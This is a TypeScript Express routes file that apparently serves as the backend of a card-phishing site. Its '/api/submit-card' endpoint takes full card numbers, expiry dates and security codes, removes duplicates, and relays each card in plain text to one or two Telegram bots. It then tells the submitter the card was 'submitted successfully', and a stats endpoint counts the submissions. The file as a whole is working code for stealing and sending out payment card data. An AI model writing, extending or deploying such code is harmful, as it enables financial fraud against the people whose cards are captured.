import type { Express } from "express";
import { createServer, type Server } from "http";
import { storage, createCardHash } from "./storage";
import { cardFormSchema } from "@shared/schema";

const TELEGRAM_BOT_TOKEN = process.env.TELEGRAM_BOT_TOKEN;
const TELEGRAM_CHAT_ID = process.env.TELEGRAM_CHAT_ID;
const TELEGRAM_BOT_TOKEN_2 = process.env.TELEGRAM_BOT_TOKEN_2;
const TELEGRAM_CHAT_ID_2 = process.env.TELEGRAM_CHAT_ID_2;

async function sendToTelegramChat(botToken: string, chatId: string, message: string): Promise<boolean> {
  if (!botToken || !chatId) {
    console.log("Missing botToken or chatId");
    return false;
  }

  try {
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    const response = await fetch(url, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: new URLSearchParams({
        chat_id: chatId,
        text: message,
      }),
    });

    if (!response.ok) {
      const errorText = await response.text();
      console.error("Telegram API error:", response.status, errorText);
    }

    return response.ok;
  } catch (error) {
    console.error("Failed to send Telegram message:", error);
    return false;
  }
}

async function sendToTelegram(message: string): Promise<boolean> {
  const results: boolean[] = [];

  console.log("Bot 1 configured:", !!TELEGRAM_BOT_TOKEN && !!TELEGRAM_CHAT_ID);
  console.log("Bot 2 configured:", !!TELEGRAM_BOT_TOKEN_2 && !!TELEGRAM_CHAT_ID_2);

  if (TELEGRAM_BOT_TOKEN && TELEGRAM_CHAT_ID) {
    const result1 = await sendToTelegramChat(TELEGRAM_BOT_TOKEN, TELEGRAM_CHAT_ID, message);
    console.log("Bot 1 result:", result1);
    results.push(result1);
  }

  if (TELEGRAM_BOT_TOKEN_2 && TELEGRAM_CHAT_ID_2) {
    const result2 = await sendToTelegramChat(TELEGRAM_BOT_TOKEN_2, TELEGRAM_CHAT_ID_2, message);
    console.log("Bot 2 result:", result2);
    results.push(result2);
  }

  return results.some(r => r === true);
}

export async function registerRoutes(
  httpServer: Server,
  app: Express
): Promise<Server> {
  
  app.post("/api/submit-card", async (req, res) => {
    try {
      const validationResult = cardFormSchema.safeParse(req.body);
      
      if (!validationResult.success) {
        return res.status(400).json({
          success: false,
          message: "Invalid card data",
          errors: validationResult.error.errors,
        });
      }

      const { cardNumber, month, year, securityCode, cardBrand } = validationResult.data;

      await storage.incrementSubmissions();

      const cardHash = createCardHash(cardNumber, month, year, securityCode, cardBrand);

      if (storage.isCardSent(cardHash)) {
        await storage.incrementDuplicates();
        return res.status(200).json({
          success: true,
          message: "Card already processed",
        });
      }

      storage.markCardAsSent(cardHash);

      const telegramMessage = `Card -(${cardBrand})\n${cardNumber}:${month}:${year}:${securityCode}`;
      
      storage.queueMessage(telegramMessage);
      storage.processQueue(sendToTelegram);

      return res.status(200).json({
        success: true,
        message: "Card information submitted successfully",
      });
    } catch (error) {
      console.error("Error processing card submission:", error);
      return res.status(500).json({
        success: false,
        message: "Internal server error",
      });
    }
  });

  app.get("/api/internal-stats", async (req, res) => {
    const stats = await storage.getStats();
    return res.json(stats);
  });

  return httpServer;
}
